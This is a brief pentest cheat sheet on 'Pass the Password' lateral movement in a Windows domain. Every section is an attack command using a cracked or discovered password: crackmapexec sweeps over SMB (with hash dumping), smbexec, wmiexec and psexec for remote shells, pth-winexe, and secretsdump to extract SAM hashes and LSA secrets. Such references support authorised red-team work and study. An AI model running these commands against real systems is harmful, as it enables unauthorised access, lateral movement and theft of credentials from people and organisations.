Pass the Password
Overview
Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec
to pass it around the network and see if we can log into any other target(s) with that credential
Attack 1: crackmapexec
sudo crackmapexec smb <target-or-CIDR> -u username -p password -d domain
Example
crackmapexec
has an array of command line switches as well; some of which include --sam
to dump hashes while running the attack.
Attack 2: smbexec.py
smbexec.py 'domain.tld/user.name:password@target'
Attack 3: wmiexec.py
wmiexec.py 'domain.tld/user.name:password@target' cmd.exe
Attack 4: psexec.py
psexec.py 'domain.tld/user.name:password@target' cmd.exe
Attack 5: pth-winexe
pth-winexe --user='domain.tld/user.name%password' //target-ip cmd.exe
Attack 6: secretsdump.py
Dumps SAM hashes from the target and LSA secrets.
secretsdump.py 'domain.tld/user.name:password@target'